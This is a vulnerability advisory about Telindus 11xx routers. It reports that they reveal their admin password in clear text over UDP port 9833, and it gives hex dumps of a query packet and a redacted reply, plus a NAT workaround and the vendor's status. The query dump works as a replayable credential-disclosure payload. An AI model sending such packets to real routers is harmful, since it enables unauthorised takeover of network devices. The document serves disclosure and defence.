|
Brought to you by:
Suppliers of:
|
|
|
| |
| The 11xx router series by Telindus has a very serious remotely exploitable compromise, due to the fact that an intruder may mimic the behavior of a desktop management application, thus getting control of the router. |
| |
Credit:
The information has been provided by finelli.
|
| |
The 11xx router series has a management program, freely downloadable from the Telindus site that allows an administrator to remotely manage the router.
This program tries to discovery router boxes in the LAN through UDP broadcast. Next it sends another different UDP unicast packet to the answering boxes, to which the router answers with an UDP packet that contains, among the others, the software revision number, the router name and the password for accessing the device.
All the information is sent in clear text. All the traffic happens on UDP port 9833.
It is possible to exploit this behavior in a billion ways: on a LAN it is enough to download and run the administration tool while simply sniffing the traffic. On a WAN it is enough to craft a hand-made packet that queries the router in the same way the management program does.
As an example, this is the complete dump (with the Ethernet frame) of a ``request'' packet. The payload is the last 62 bytes, beginning from ``19 73 04'', the sender address is 172.16.0.16 and the router (recipient) is 172.16.0.253:
00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF
This is the dump of an ``answer'' packet (with the Ethernet frame). The payload is the last 204 bytes, beginning from ``19 73 04''. The password has been replaced by ``x''
00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00
Solution:
We have not been able to understand if this ``feature'' can be disabled. Otherwise, it seems that the only solution would be to filter the traffic on UDP port 9833 directed to the box.
A quick and dirty workaround is to redirect WAN traffic to port 9833/udp to another IP address in the LAN, better if it's an unused one. This can be achieved by connecting (via telnet) to the router, logging in, and issuing the following command: ``add auto udp 9833 9833 9833 10.0.0.10'', where 10.0.0.10 is some unused IP address in your LAN. This sets up a static NAT rule that redirects traffic entering WAN interface. Then, you must also enter the command ``save'' to save your configuration to NVRAM. You can optionally check the status of the NAT table by issuing ``show auto''. If you made some mistake, you can ``del auto <number>'', and then retry. Maybe there are better methods, we used this one because of we already knew how to use the command ``auto''.
Vendor status:
We contacted Telindus, through their Italian office. They told us that they are actively working on this issue. We told them that after a month we would have informed the security community of the problem.
Telindus told us that a beta version of the firmware should be available soon. Last but not least, the banner of the router has the word Arescom in it, so perhaps other devices from that vendor are exploitable.
|
|
|
|
|
